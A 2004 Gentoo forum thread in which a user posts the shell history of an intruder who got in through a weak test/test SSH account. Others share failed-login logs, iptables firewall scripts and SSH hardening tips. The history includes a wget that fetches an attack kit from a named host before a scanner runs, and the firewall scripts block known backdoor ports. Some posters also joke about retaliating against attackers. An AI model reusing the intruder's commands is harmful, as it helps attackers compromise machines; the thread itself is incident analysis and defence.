# i got hacked. what were they up to?

## bcore

Ok, so I seem to have been hacked. I run a gentoo box as my home machine, but to be honest, I don't take nearly as good care of it as I should.. I'm sure I got what I deserved.  :Smile: 

Here's what I found out. The other day, I noticed a failed SSH login on my little syslog scroller to the user named "test". I completely forgot that such a user existed, but thinking about it, I'm pretty sure that when I first installed gentoo on this machine 3 years ago, I made an account with the username AND password of "test", and I guess I forgot to delete it. Now you see why I say I got what I deserved. I decided that I should delete the account, and when I went to delete it's home directory, I noticed that a directory named "1", had been created. Inside that directory was a directory called "lib", and in the lib directory was a program I had never seen before. Here's the ls output:

```

total 893

-rw-r--r--  1 1013 users 166154 Aug  7 02:10 Born2Kill.seen

-rw-------  1 1013 users  17982 Oct  9  2000 COPYING

-rw-r--r--  1 1013 users 122242 Aug  7 02:12 LinkEvents

-rw-------  1 1013 users   2147 Oct  9  2000 Makefile

-rw-------  1 1013 users   3398 Nov  8  2000 README

-rw-------  1 1013 users   1569 Oct  9  2000 TODO

-rw-------  1 1013 users  25722 Nov  8  2000 VERSIONS

-rwx------  1 1013 users    936 Dec 21  2003 checkmech

-rwx------  1 1013 users  20290 Oct  9  2000 configure

-rwx------  1 1013 users 474228 Sep 29  2001 crond

-rw-r--r--  1 1013 users    111 Aug  7 02:00 emech.users

-rw-r--r--  1 1013 users     76 May 27  2003 knopki.seen

-rw-------  1 1013 users  22935 Oct  9  2000 mech.help

-rw-r--r--  1 1013 users   1085 Aug  7 02:00 mech.levels

-rw-------  1 1013 users      6 Aug  3 19:49 mech.pid

-rw-r--r--  1 1013 users    484 Aug  7 02:00 mech.session

-rw-------  1 1013 users   4842 Jul 28 02:29 mech.set

-rw-r--r--  1 1013 users   4862 Jul 28 02:33 mech.setes

drwx------  2 1013 users    304 Nov  8  2000 randfiles

drwx------  2 1013 users   1184 Sep 29  2001 src

```

I opened the user's .bash_history, and here's what I found:

```

w

ls

dir

cd\

hash

cd /bin/ls

ls

mkdir 1

ls

cd 1

passwd

passwd

passwd

ls

w

uname -a

cd /var

ls

cd mail

ls

test

./tets

./test

wget

cd

ls

rm -rf 1

ls

cd /sbin

ls

mkdir 1

wget

wget born2kill.100free.com/run.tar

cd

mkdir 1

cd 1

wget born2kill.100free.com/run.tar

ls

tar xzvf run.tar

tar xvf run.tar

ls

cd run

ls

./sc 168 32773 25 150

uptime

```

The creation date of the "1" and "lib" directory is august 3rd, so this happened recently. My question is whether anyone knows what this person was up to? The part I wonder in particular about is the line "./sc <a bunch of numbers>". I went to the URL where they downloaded the program, but it is no longer working. chkrootkit doesn't find anything.

I'm not too worried about having been hacked, as I was planning on replacing my hard drive within a week or two and starting fresh anyways. This time I'll be more careful, obviously.  :Smile: 

mod edit: Sticky

amne

edit2: 2006-04-10 unstuck

amne

----------

## jjasghar

that is interesting...

moral of that storie, don't have a username called "test"   :Wink:   :Razz: 

----------

## bcore

Hmm, more web searching seems to reveal that they were attempting (and failing) to install and run an IRC bot. Since I have never gotten into IRC, I have no idea what that is, although I've heard the term many times.  :Smile: 

----------

## sirber

You can surely get his IP and contact his ISP about hacking attempt.

----------

## tomchuk

The source IP of the attack is just another compromised box, with either guest/guest, test/test, admin/admin, root/root username/password combos running sshd. I've been getting so many of these attempts that I've stopped reporting these compromised boxes. There have been a huge ammount of scans using this new tool since the end of July and there are probably tens of thousands of compromised boxes out there.

The attacker's usual course of events is to login from a compromised box, change the password, download this little "run.tar" kit maybe run an irc bot, and then set the scanning tool to scan an entire class A. Many time's he'll also run a trojaned sshd.  He'll usually show up later to collect the results and/or use your box to infiltrate others. The scary part is that whoever is behind this hasn't done anything with these compromised boxen yet, they just seem to be cataloging the results of the scans.

----------

## brettlpb

Sorry to de-rail, but what log are you scrolling to see failed ssh logins etc?

----------

## bcore

/var/log/messages with some serious grep action.

----------

## Captain_Loser

Wow, I just looked through my logs and found a whole lot of failed ssh logins, and what I guess are rootkit attempts.. I am very surprised to see this many cracking attempts aimed at me. I am running a very safe system, but it makes you think.. I am sure glad gentoo has things like emerge -u.

----------

## Determined

Do you ssh this box from the internet? I hope there is a good reason to have open ports like that.

The moral of the story really: Strong passwords, hardware firewall, encrypt all network traffic possible.

----------

## bcore

Yeah, I'm SSH'ed in from work most days.. Easiest way to check my email and transfer files between.

I'd say the moral of the story here is don't create a test account, and if you do, don't also make it's password "test", and if you do that too, don't forget to delete it.  :Smile: 

----------

## tumbak

I noticed a directory called src/ in your output, can you tar it and share it please, or tar the whole ~test   :Very Happy: 

----------

## JudgeNik

 :Mad:  damn.

I've seen a folder called /1/ on my server.

I've been told to emerge chkrootkit.

apparently i've been rooted...

Don't know how my server was setup beginning of last year and it never had any testing accounts on it and no accounts with same/same.

----------

## drspewfy

off course you have been routed,,!!!!

and he installed a Psybnc kinda bot, He uses YOUR ip to connect to the IRc and like that talk with others using your ip, if somebody tries to aatack him he wont get down cuz, hes spoofing your IP.. and you will get down  :Razz: 

You should use

"lsof" instands of netstat , ps x,  etc...

Cuz maybe you have been backdoored..

use the command "find" to see, What files had been modified in that day,

also try to use tripwire, to see what files changed since the intrusion (well that is for the nexts penetrations  :Wink:  , besides snort.

good luck!

----------

## bcore

I'm certainly willing to tar up the directory for anyone who is curious. I have no way of hosting it though...

----------

## evoweiss

Hi all,

Over the past few weeks I've noticed a similar pattern of hack attempts against my box (ssh'ing in and attempting to log in with things like "test", "NOUSER", and "root"). I keep everything up-to-date and, hence, haven't noticed anything amiss. Just a quick tip: There's no need to dig through the log file of everything, just look into the /var/log/sshd/ files to get an indication of that port's activity.

Another thing I did was invest in a hardware firewall (Zywall 1 model) which will send me an email whenever there are any events whether legitimate (me ssh'ing into my system from work) or illegitimate (attacks on my system, other attempt to gain access via ssh). I highly recommend the same to others.

Finally, I always use strong passwords and keep my system updated. I suspect I'm pretty safe  :Smile: .

Best,

Alex

----------

## jpc82

Wow I am glad I saw this post.

I was just looking at my logs and I see this

```

Aug 13 20:09:28 [sshd] Illegal user test from 194.78.243.110

Aug 13 20:09:29 [sshd] reverse mapping checking getaddrinfo for dialup686.gent.skynet.be failed - POSSIBLE BREAKIN ATTEMPT!

Aug 13 20:09:29 [sshd] error: Could not get shadow information for NOUSER

Aug 13 20:09:29 [sshd] Failed password for illegal user test from 194.78.243.110 port 3579 ssh2

Aug 13 20:09:31 [sshd] User guest not allowed because shell /dev/null is not executable

Aug 13 20:09:42 [sshd] Failed password for root from 194.78.243.110 port 4229 ssh2

```

Does this mean that all thier attempts were not successful?  I have good passwords, and I run glsa-check every week to verify my system.

Also there is the line "Failed password for root"  I'm confused since I have ssh to not allow root access, or is this just the regular error for failed root access?

Also, would moving ssh to another post stop these attacks?  I'm assuming it would since they would be trying to connect to the wrong port?

----------

## grant.mcdorman

 *bcore wrote:*   

> Yeah, I'm SSH'ed in from work most days.. Easiest way to check my email and transfer files between.
> 
> I'd say the moral of the story here is don't create a test account, and if you do, don't also make it's password "test", and if you do that too, don't forget to delete it. 

 I ssh in from work too, but I've set up the firewall so the ssh port is only open to my work IP - connection attempts from any other IP are dropped. If your work IP is a fixed address, and your firewall supports it (Linux of course does, and some router boxes, e.g. SMC's, do too), you could do this too to get better security. Makes it kinda hard for the 31337 sk1rpt kiddies to try to break in that way.

----------

## bcore

Unfortunately I don't get a static IP from work, but I'm thinking I'm gonna set sshd up to only allow key logins, since I use keychain from work. I've already also got it set up do disallow root logins, so I figure I should be reasonably safe...

----------

## smonijhay1

geez, what an awesome post!

thought I should give my info a look since I saw this post and sure enough there were numerous attempts at trying to connect using random user names.

now I must learn to set up and configure a good firewall (ipchains?  iptables?)

----------

## bcore

One other thing I have to remark is that looking at the bash_history really shows how inept this person was.. Total script kiddie. I mean cummon.. "cd\"??!  The lame failed attempt to read my mail, then install something in "/sbin"?

I definitely don't think I was up against anyone with skill, so if I had been properly prepared I would have had nothning to worry about..

----------

## tomchuk

 *bcore wrote:*   

> I definitely don't think I was up against anyone with skill.

 

Well he definately wasn't up against anyone with skill  :Razz:  Come on, three years with a test user with test as a password - you're in no place to critique anyone's typos  :Smile: 

----------

## bcore

Re-read my posts. I fully admitted that I made a mistake, and I said that if I had done my due diligence, I would have been fine.

----------

## tomchuk

I know, it was a joke, notice the 'Razz' and 'Smile' smileys.

----------

## GentooBox

I hate ssh worms...

They will never stop.. just like any other worm.

----------

## Ox53746F6E65

use portknocking to make your system more secure.

----------

## bcore

 *tomchuk wrote:*   

> I know, it was a joke, notice the 'Razz' and 'Smile' smileys.

 

Argh, sorry, stressful day.  :Smile: 

----------

## Captain_Loser

 *bcore wrote:*   

> I'm certainly willing to tar up the directory for anyone who is curious. I have no way of hosting it though...

 

I don't mind hosting. However I will remove something required for the program to operate, just so that I won't be hosting something evil. PM, or e-mail me if your interested.

----------

## evoweiss

Hi All,

This is definitely becoming an interesting thread and I've got a bit more to contribute after an interesting email today.

I received an email that was purportedly from zywall and asked me to fill out a 'customer survey'. It smelled like BS to me, and using the wonderful pine email client, I quickly saw that it was. 

I would have been redirected to some website that, undoubtedly, would have fscked around with some aspect of my set-up.

Unfortunately, I managed to accidently delete the email. Did anybody else receive something similar and how did they know I use a zywall router/firewall (lucky guess?).

Also, I noticed a post that mentioned port knocking. I've heard of this before, but am not sure what it is nor how to set it up. Care to explain it to me and point me to any useful how-tos in the event that I'm interested?

If I receive another email like it (and I probably will), I'll be sure to save it this time and even do a wget on the url I'm directed to, post the html code, etc.

Best,

Alex

----------

## bcore

 *Captain_Loser wrote:*   

> I don't mind hosting. 

 

How could I turn that down. We have very similar signatures.  :Smile:  I'll email it to you tomorrow..

----------

## Paulten

So you got a test user without a password right? Does ssh permit users with empty password? It should not, I have 

PermitEmptyPasswords no in my sshd_config, I don't if I put it there myself or if this is default behavior. 

Did you have username: test and passwd: test maybe ? :p

Later

----------

## JudgeNik

As he previously stated in the first post:

 *Quote:*   

> ...I made an account with the username AND password of "test"...

 

----------

## Paulten

 *JudgeNik wrote:*   

> As he previously stated in the first post:
> 
>  *Quote:*   ...I made an account with the username AND password of "test"... 

 

soorrry  :Razz: 

----------

## devon

 *evoweiss wrote:*   

> Also, I noticed a post that mentioned port knocking. I've heard of this before, but am not sure what it is nor how to set it up. Care to explain it to me and point me to any useful how-tos in the event that I'm interested?

 

Google for port knocking.  :Smile: 

----------

## Captain_Loser

I notcied that I was getting about 5 of these crack attempts a day, so I set up a simple firewall to see if I could try to keep some of this stuff away.  I made a script that uses iptables with anti portscan and anti os-fingerprinting stuff in it. I know that it is impossible to stop all port scans and all os fingerprinting attempts, but I can try. Now that I run this firewall I haven't gotten any of these crack attempts against my machine.  The attempts on my machine had been going on for about a month, and now they have stopped.  I am putting this script on other linux boxes that are getting hit to see if this stops the attempts on them as well.

----------

## silentbob

 *Captain_Loser wrote:*   

> ...  I made a script that uses iptables with anti portscan and anti os-fingerprinting stuff in it.

 

Care to share with us, or is it (a) already available or (b) security risk?

----------

## OdinsDream

Could someone help me figure out where my /var/log/sshd information is?

I have other entries in /var/log/, but I have no ssh-related files or directories. ps shows:

 /usr/sbin/syslogd -m 0

...running. Do I need to specifically enable sshd logging somewhere? Many thanks, great thread!

----------

## Captain_Loser

 *silentbob wrote:*   

>  *Captain_Loser wrote:*   ...  I made a script that uses iptables with anti portscan and anti os-fingerprinting stuff in it. 
> 
> Care to share with us, or is it (a) already available or (b) security risk?

 

Don't mind sharing it.  Its not as secure as it could be though.  I am putting this firewall on several machines that have different access needs, so instead of blocking everything and opening up the necessary ports, I just blocked certain types of traffic. I also didn't add logging support, but logging isn't too difficult to add. The bad flags section, and the os figerprinting section are what seems to have done the trick. Here it is.

```
#!/bin/bash

#Define the location of the IPTABLES executable

IPTABLES=/sbin/iptables

#Interfaces

#These are only needed for Forwarding

EXTIF=eth0 #External Interface

INTIF=eth1 #Internal Interface

#Lets be friendly

echo "Loading Firewall Ruleset"

###########################################################################

#INSMOD section, only uncomment if you get errors

# or know that you don't have the following modules

# built into the kernel

###########################################################################

#echo "Loading Modules"

#/sbin/modprobe ip_talbes

#/sbin/modprobe iptable_filter

#/sbin/modprobe ip_conntrack

##########################################################################

#Clear out all current chains and restore defaults

##########################################################################

$IPTABLES -F

$IPTABLES -F -t mangle

$IPTABLES -F -t nat

$IPTABLES -X

$IPTABLES -X -t mangle

$IPTABLES -X -t nat

#Set Defaults to ACCEPT

$IPTABLES -P INPUT ACCEPT

$IPTABLES -P OUTPUT ACCEPT

$IPTABLES -P FORWARD ACCEPT

############################################################################

#Define User Chains

#There should be no need to edit this section

#Make all changes after this section

############################################################################

#SYN flood protection

$IPTABLES -N SYN-FLOOD

$IPTABLES -A SYN-FLOOD -p tcp --syn -m limit --limit 1/s --limit-burst 4 -j ACCEPT

$IPTABLES -A SYN-FLOOD -p tcp --syn -j DROP

$IPTABLES -A SYN-FLOOD -p tcp ! --syn -j ACCEPT 

#Ping of Death Protection

$IPTABLES -N POD

$IPTABLES -A POD -p icmp --icmp-type echo-request -m limit --limit 1/s -j ACCEPT

#Bad Flags section

$IPTABLES -N BF

$IPTABLES -A BF -p tcp --tcp-flags ALL NONE -j DROP #NULL scan

$IPTABLES -A BF -p tcp --tcp-flags ALL ALL -j DROP #XMAS scan

$IPTABLES -A BF -p tcp --tcp-flags ALL FIN,URG,PSH -j DROP #NMAP

$IPTABLES -A BF -p tcp --tcp-flags ALL SYN,RST,ACK,FIN,URG -j DROP #NMAP

$IPTABLES -A BF -p tcp --tcp-flags SYN,RST SYN,RST -j DROP #SYN-RST scan

$IPTABLES -A BF -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP #SYN-FIN scan

#OS Fingerprinting

$IPTABLES -N OSF

$IPTABLES -A OSF -p tcp --dport 0 -j DROP #Block port 0

$IPTABLES -A OSF -p udp --dport 0 -j DROP #Block port 0

$IPTABLES -A OSF -p tcp --sport 0 -j DROP #Block port 0

$IPTABLES -A OSF -p udp --sport 0 -j DROP #Block port 0

$IPTABLES -A OSF -p icmp --icmp-type address-mask-request -j DROP #Block ICMP-Address-Mask

$IPTABLES -A OSF -p icmp --icmp-type address-mask-reply -j DROP #Block ICMP-Address-Mask

#Various Virii and Backdoors

$IPTABLES -N BD

$IPTABLES -A BD -p tcp --dport 6670 -j DROP #Deepthroat

$IPTABLES -A BD -p tcp --dport 1243 -j DROP #Subseven

$IPTABLES -A BD -p udp --dport 1243 -j DROP #Sebseven

$IPTABLES -A BD -p tcp --dport 27374 -j DROP #Subseven

$IPTABLES -A BD -p udp --dport 27374 -j DROP #Subseven

$IPTABLES -A BD -p tcp --dport 6711:6713 -j DROP #Subseven

$IPTABLES -A BD -p tcp --dport 12345:12346 -j DROP #Netbus

$IPTABLES -A BD -p tcp --dport 20034 -j DROP #Netbus

$IPTABLES -A BD -p udp --dport 31337:31338 -j DROP #Back Orifice

$IPTABLES -A BD -p udp --dport 28431 -j DROP #Hack-a-Tack-2000

#SMB Traffic (wind0ws file sharing)

$IPTABLES -N SMB

$IPTABLES -A SMB -p tcp --dport 137 -j DROP

$IPTABLES -A SMB -p udp --dport 137 -j DROP

$IPTABLES -A SMB -p tcp --sport 137 -j DROP

$IPTABLES -A SMB -p udp --sport 137 -j DROP

$IPTABLES -A SMB -p tcp --dport 138 -j DROP

$IPTABLES -A SMB -p udp --dport 138 -j DROP

$IPTABLES -A SMB -p tcp --sport 138 -j DROP

$IPTABLES -A SMB -p udp --sport 138 -j DROP

$IPTABLES -A SMB -p tcp --dport 139 -j DROP

$IPTABLES -A SMB -p udp --dport 139 -j DROP

$IPTABLES -A SMB -p tcp --sport 139 -j DROP

$IPTABLES -A SMB -p udp --sport 139 -j DROP

$IPTABLES -A SMB -p tcp --dport 445 -j DROP

$IPTABLES -A SMB -p udp --dport 445 -j DROP

$IPTABLES -A SMB -p tcp --sport 445 -j DROP

$IPTABLES -A SMB -p udp --sport 445 -j DROP

#Forwarding support

$IPTABLES -N PASS

$IPTABLES -A PASS -i $EXTIF -o $INTIF -m state --state ESTABLISHED,RELATED -j ACCEPT

$IPTABLES -A PASS -i $INTIF -o $EXTIF -j ACCEPT

$IPTABLES -A PASS -j LOG

############################################################################

#Add user chains to system chains

#This section should be edited to your needs.

#Comment or uncomment sections as needed

############################################################################

#Enable NAT Forwading between EXTIF and INTIF

#Make sure to eneable forwarding in sysctl section below

#$IPTABLES -A FORWARD -j PASS

#$IPTABLES -t nat -A POSTROUTING -o $EXTIF -j MASQUERADE

#Drop invalid Packets

$IPTABLES -A INPUT -m state --state INVALID -j DROP

$IPTABLES -A FORWARD -m state --state INVALID -j DROP

#SYN Flood Protection

$IPTABLES -A INPUT -j SYN-FLOOD

$IPTABLES -A FORWARD -j SYN-FLOOD

#Block Ping of Death

$IPTABLES -A INPUT -j POD

$IPTABLES -A FORWARD -j POD

#Drop Bad Flags (port scans)

$IPTABLES -A INPUT -j BF

$IPTABLES -A FORWARD -j BF

#Block OS Fingerprinting (Doesn't always work)

$IPTABLES -A INPUT -j OSF

$IPTABLES -A FORWARD -j OSF

#Block Virii and Backdoors

$IPTABLES -A INPUT -j BD

$IPTABLES -A FORWARD -j BD

#Block SMB Traffic (windo0s file sharing)

#Only blocks the traffic from getting in/out of the LAN

$IPTABLES -A INPUT -j SMB

$IPTABLES -A FORWARD -j SMB

#sys-ctl variables, edit to your needs

#Enable IP Forwarding

#echo "1" > /proc/sys/net/ipv4/ip_forward

#Dyanamic Addressing (useful for forwarding)

echo "1" > /proc/sys/net/ipv4/ip_dynaddr

#Disable IP Spoofing

echo "2" > /proc/sys/net/ipv4/conf/all/rp_filter

#Don't respond to Pings

#echo "1" > /proc/sys/net/ipv4/icmp_echo_ignore_all

#Don't respond to ICMP Broadcast (smurf attacks)

echo "1" > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts

#Bad ICMP message protection

echo "1" > /proc/sys/net/ipv4/icmp_ignore_bogus_error_responses

#Disabe source routed packets. (Keeps people from looking in through the NAT)

echo "0" > /proc/sys/net/ipv4/conf/all/accept_source_route

#Disable Redirects (Redirects can be used to mess up routing tables, aka spyware)

echo "0" > /proc/sys/net/ipv4/conf/all/accept_redirects

#Enable log_martians (logs bad traffic)

echo "1" > /proc/sys/net/ipv4/conf/all/log_martians

#Enable SYN-Cookies (not necessary in some kernels)

#echo "1" > /proc/sys/net/ipv4/tcp_syncookies

#Continue being friendly

echo "Done"

```

----------

## Yoda_Oz

you dudes are really smart. how did you get to know all that stuff? i would not have the first idea of anything yous are talking about!

im in total awe!

----------

## Mben

after reading this tread i took a look at my logs and found that i too had been probed. is there any way to report this? that part of my log is below:

```

Aug  2 18:46:57 localhost sshd[5288]: Failed password for illegal user test from  ::ffff:64.246.32.92 port 46390 ssh2

Aug  2 18:46:57 localhost sshd[5290]: User guest not allowed because shell /dev/ null is not executable

Aug  2 18:46:58 localhost sshd[5290]: error: Could not get shadow information fo r NOUSER

Aug  2 18:46:58 localhost sshd[5290]: Failed password for illegal user guest fro m ::ffff:64.246.32.92 port 46484 ssh2

Aug  2 18:46:58 localhost sshd[5293]: Illegal user admin from ::ffff:64.246.32.9 2

Aug  2 18:46:59 localhost sshd[5293]: error: Could not get shadow information fo r NOUSER

Aug  2 18:46:59 localhost sshd[5293]: Failed password for illegal user admin fro m ::ffff:64.246.32.92 port 46553 ssh2

Aug  2 18:46:59 localhost sshd[5295]: Illegal user admin from ::ffff:64.246.32.9 2

Aug  2 18:47:00 localhost sshd[5295]: error: Could not get shadow information fo r NOUSER

Aug  2 18:47:00 localhost sshd[5295]: Failed password for illegal user admin fro m ::ffff:64.246.32.92 port 46612 ssh2

Aug  2 18:47:01 localhost sshd[5297]: Illegal user user from ::ffff:64.246.32.92

Aug  2 18:47:01 localhost sshd[5297]: error: Could not get shadow information fo r NOUSER

Aug  2 18:47:01 localhost sshd[5297]: Failed password for illegal user user from  ::ffff:64.246.32.92 port 46692 ssh2

Aug  2 18:47:03 localhost sshd[5299]: Failed password for root from ::ffff:64.24 6.32.92 port 46769 ssh2

Aug  2 18:47:04 localhost sshd[5301]: Failed password for root from ::ffff:64.24 6.32.92 port 46842 ssh2

Aug  2 18:47:05 localhost sshd[5303]: Failed password for root from ::ffff:64.24 6.32.92 port 46929 ssh2

Aug  2 18:47:05 localhost sshd[5305]: Illegal user test from ::ffff:64.246.32.92

Aug  2 18:47:05 localhost sshd[5305]: error: Could not get shadow information fo r NOUSER

Aug  2 18:47:05 localhost sshd[5305]: Failed password for illegal user test from  ::ffff:64.246.32.92 port 46992 ssh2

```

----------

## silentbob

```
$ grep -i "failed password" /var/log/messages

Aug  2 23:29:23 <myhost> sshd[2236]: Failed password for illegal user test from 220.69.12.96 port 57967 ssh2

Aug  2 23:29:26 <myhost> sshd[2238]: Failed password for illegal user guest from 220.69.12.96 port 58007 ssh2
```

```
$ grep -i "user guest" /var/log/messages

Aug  2 23:29:26 <myhost> sshd[2238]: User guest not allowed because shell /dev/null is not executable
```

Me too until I've locked down my iptables config. Now I have restricted the SSH port (22) to only the 2 IP addresses that I will connect from.

----------

## revertex

hi guys!

this tread is really interesting to open my eyes about security.

looking in these forums you can found nice tip that how make your  boxes a little more safe.

-port knocking hide your ports to regular port scanners, only revealing when a special portscan sequency is send.

-keychain, you need bring your key with you, not so handy, do not use in untrusted machine.(look at ibm developerworks drobbins article )

-skey, the one way password, just work one time, perfect for login form untrusted machines.

-edit your sshd_config, disallow passwordless logins, root logins, and if possible allow login only for one user or group.

-if you ssh from work/school tha haven't a static ip, create a dinamic dns account (no-ip, dyndns) for your office box and only allow logins from that address, like "myoffice.homeip.net", me_at_school.homeip.net"

-use a nice root tail to watch what's happen closely

-install something like chkrootkit, integrit, snort, configure once and run forever, no excuses.

----------

## silentbob

 *revertex wrote:*   

> -edit your sshd_config, disallow passwordless logins, root logins, and if possible allow login only for one user or group.

 

Just to clarify for anyone else who reads the filename too quickly, you need to edit the /etc/ssh/sshd_config file as stated (and not /etc/ssh/ssh_config like I have just spent the past few minutes playing with, and getting strange ssh, client, errors!)

[edit: /etc/ssh/sshd_config - d'oh]Last edited by silentbob on Wed Aug 18, 2004 7:08 am; edited 1 time in total

----------

## zerojay

 *silentbob wrote:*   

>  *revertex wrote:*   -edit your sshd_config, disallow passwordless logins, root logins, and if possible allow login only for one user or group. 
> 
> Just to clarify for anyone else who reads the filename too quickly, you need to edit the /etc/sshd_config file as stated (and not /etc/ssh_config like I have just spent the past few minutes playing with, and getting strange ssh, client, errors!)

 

/etc/ssh/sshd_config

----------

## Goodle

I think it would be interesting to set up a honeypot for this lame attack.  It looks like the poeple that are trying this have no idea what they are doing... It would be fun to screw round with them. Of course this would  take time to set up a honeypot... SELinux Joy!

----------

## skyfolly

would it be more secure without SSH installed?

Damn it, I have to install iptables and chrootkit tonight right away.

----------

## Goodle

 *Quote:*   

> would it be more secure without SSH installed?
> 
> Damn it, I have to install iptables and chrootkit tonight right away.

 

There in no security vulnerability here... Only if you are a retarded and have a user named test with the password test.  Don't go though the trouble, unless...

----------

## Jeremy_Z

I may be going to write a port knocking client / server in Perl, if some are interested i will post it.

My main concern is to secure my parent's gentoo routing box, currently it has all ports stealth (excepted some p2p ports) and i want to write something to knock the ssh port from my home.

----------

## skyfolly

shorewall looks good enough for me, quite nice documentation too. I am reading it.

----------

## Paulten

I have a small iptables script which I think works very well. 

And another sshd_config tip is to "PermitRootLogin no".

And while we are on the subject I recommand using ssh pubkeys. 

I use ssh-keygen and generate a key and upload it to the server as I described in this article http://paul.kde.no/modules/articles/article.php?id=5

and btw I got a tip that I should use DSA instead of rsa as I wrote in that article, I'll change it when I get some spare time. 

Alternative, net-misc/keychain is worth looking into.

I also use /etc/hosts.allow to permit ssh access only to the IP's listed. 

Create the file /etc/hosts.allow and add : 

 sshd : localhost : allow 

 sshd : someip : allow 

 sshd : workip : allow 

 sshd : ALL : deny 

From debian's hosts.allow : 

```

# /etc/hosts.allow: list of hosts that are allowed to access the system.

#                   See the manual pages hosts_access(5), hosts_options(5)

#                   and /usr/doc/netbase/portmapper.txt.gz

#

# Example:    ALL: LOCAL @some_netgroup

#             ALL: .foobar.edu EXCEPT terminalserver.foobar.edu

#

# If you're going to protect the portmapper use the name "portmap" for the

# daemon name. Remember that you can only use the keyword "ALL" and IP

# addresses (NOT host or domain names) for the portmapper. See portmap(8)

# and /usr/doc/portmap/portmapper.txt.gz for further information.

```

My iptables script : 

```

#eth0=lokal

echo 1 > /proc/sys/net/ipv4/ip_forward

/sbin/iptables -F

/sbin/iptables -X

/sbin/iptables -t nat -F

/sbin/iptables -N FILTER

/sbin/iptables -N LOKAL

/sbin/iptables -P INPUT DROP

#/sbin/iptables -A INPUT -p udp -i eth0 -s 192.168.0.0/24 -j QUEUE

/sbin/iptables -A INPUT -i eth1 -j FILTER

/sbin/iptables -A INPUT -i ! eth1 -j LOKAL

/sbin/iptables -A FILTER -m state --state ESTABLISHED,RELATED -j ACCEPT

/sbin/iptables -A FILTER -i lo -m state --state NEW -j ACCEPT

/sbin/iptables -A FILTER -p tcp --dport 80 -j ACCEPT

/sbin/iptables -A FILTER -p tcp --dport 25 -j ACCEPT

#/sbin/iptables -A FORWARD -p udp -i eth0 -s 192.168.0.0/24 -j QUEUE

#/sbin/iptables -A FORWARD -p tcp -i eth0 -s 192.168.0.0/24 -j QUEUE

#/sbin/iptables -A FORWARD -p tcp -i eth0 -s 192.168.0.0/24 -m string --string X-Kazaa -j QUEUE

/sbin/iptables -A FILTER -p tcp --dport 22 -j ACCEPT

/sbin/iptables -A FILTER -p tcp --dport 113 -j REJECT

/sbin/iptables -A FILTER -o eth0 -j ACCEPT

/sbin/iptables -A LOKAL -j ACCEPT

/sbin/iptables -t nat -A POSTROUTING -o eth1 -j SNAT --to myinetIP.

/sbin/iptables -t nat -A PREROUTING -p tcp -i eth1 --dport 21 -j DNAT --to-destination 192.168.0.21

/sbin/iptables -t nat -A PREROUTING -p tcp -i eth1 --dport 3306 -j DNAT --to-destination 192.168.0.23

/sbin/iptables -A OUTPUT -m state -p icmp --state INVALID -j DROP
```

Paul..

----------

## TheUlk

Hi all,

I've seen a lot of those breakin-attempts but I don't care that much about it.

I allow just one user to ssh from one certain ip.

I hope this is enough to protect my computer from ssh-breakins.

cu tu

Suggestions wellcome!

----------

## BlinkEye

 *skyfolly wrote:*   

> would it be more secure without SSH installed?
> 
> Damn it, I have to install iptables and chrootkit tonight right away.

 

of course it is. every piece of software installed (and running of course) increases the potential risk of reducing the security. if you don't use SSH, don't run it. what you do not use or need shouldn't be running

----------

## skyfolly

I am wondering if my server is behind a router, would that router's firewall enough to protect me from anything? I am using port 8080 as http port as 80 is blocked by ISP.

Hard to compromise my server through a router with limited ports open, right?

----------

## smart

You don't need to count closed ports anyway, only open ports count and they count equal no matter if the are other ports closed by router or closed due to service non existant.

----------

## BlinkEye

btw,  i noticed: over a 100 login attempts during the past few days   :Twisted Evil: 

----------

## kalisphoenix

user: test

pass: test

shell: /bin/analrapewithnailstuddedbroomstick.sh

I'm sure that there's some way to fuck someone up over ssh.  I mean, the connection goes both ways, right?

Of course, I suppose this could have indeterminate results depending on whether he sshed into PersonA's box, then from there to PersonB's, and then to mine.

I am paranoid... I've been noticing these for a few days and thought it was someone fuckin' with me.  Found this thread through pure chance.  Anyone else getting IPs in Germany, France, and elsewhere?

----------

## Jeremy_Z

Well supposing there is buffer overflow in the ssh client, yse you could do some nasty retaliation   :Laughing: 

----------

## kalisphoenix

 *Quote:*   

> # ssh 131.120.22.14
> 
> Broadcast message from root (vc/1) (Sat Aug 21 03:25:02 2004):
> 
> Owned.
> ...

 

I think that'd be funny enough and keep the guy checking his computer for rootkits and scouring his hard drive for a couple hours.  Too bad I don't know jack about ssh or scripting.  I guess now's the time to learn...

----------

## dat

 *jpc82 wrote:*   

> Wow I am glad I saw this post.
> 
> I was just looking at my logs and I see this
> 
> ```
> ...

 

What were you using to generate logs like this??

----------

## BlinkEye

he wasn't using anything. these are logs from his system because someone tried (and failed) to login. 

this line is special though:

```
Aug 13 20:09:29 [sshd] reverse mapping checking getaddrinfo for dialup686.gent.skynet.be failed - POSSIBLE BREAKIN ATTEMPT! 
```

which means, that he uses some security software.

----------

## NeddySeagoon

I've got some of these break in attempts.

The ones I have checked out all seem to come from *NIX boxes.

You can do whois <IP address from log> to get to the ISP, then send them the log fragment.

More interesting is telnet <IP address from log> 25 to connect to the smtp mail client on the box(es) that were tapping on your door. The ones I have tried all claim to be running sendmail, which suggests they are not windows boxes.

I've not sent mail that way yet, if the probes are comming from a block of dynamically assigned IP addresses, I could well spam the wrong user.

I've been tempted you open a 'honeypot' account that runs a script on every successful login to do the whois lookup, then email abuse@ISP with the log fragment or even email root@<IP _Addr> so innocent victims get to know their box is compromised.

----------

## kaidon

i've also noticed these kind of break in attempts starting arround mid of juli. 

found this thread on fulldisclosure explaining a bit what's going on:

http://archives.neohapsis.com/archives/fulldisclosure/2004-07/thread.html#1008

this worm/script/whatever seems to be finding ton's of boxes with same/same accounts out there. ammount of hit's is rapidly increasing. 

first it was solely checking for guest and test accounts. in the meantime it checks for guest, test, user, admin and tries multiple root passwords.

it's really becoming a plague.

cheers

k

----------

## den_RDC

 *BlinkEye wrote:*   

> he wasn't using anything. these are logs from his system because someone tried (and failed) to login. 
> 
> this line is special though:
> 
> ```
> ...

 

By coincidence, i have the same ip reported in my log files on one of the colocation servers i administer.

 *Quote:*   

> Aug 20 14:58:07 *hostname* sshd[25514]: reverse mapping checking getaddrinfo for dialup686.gent.skynet.be failed - POSSIBLE BREAKIN ATTEMPT!
> 
> 

 

Coincedentally, i happen to live in belgium near the city of gent ... Maybe i should organize a scriptkiddie manhunt  :Smile: .

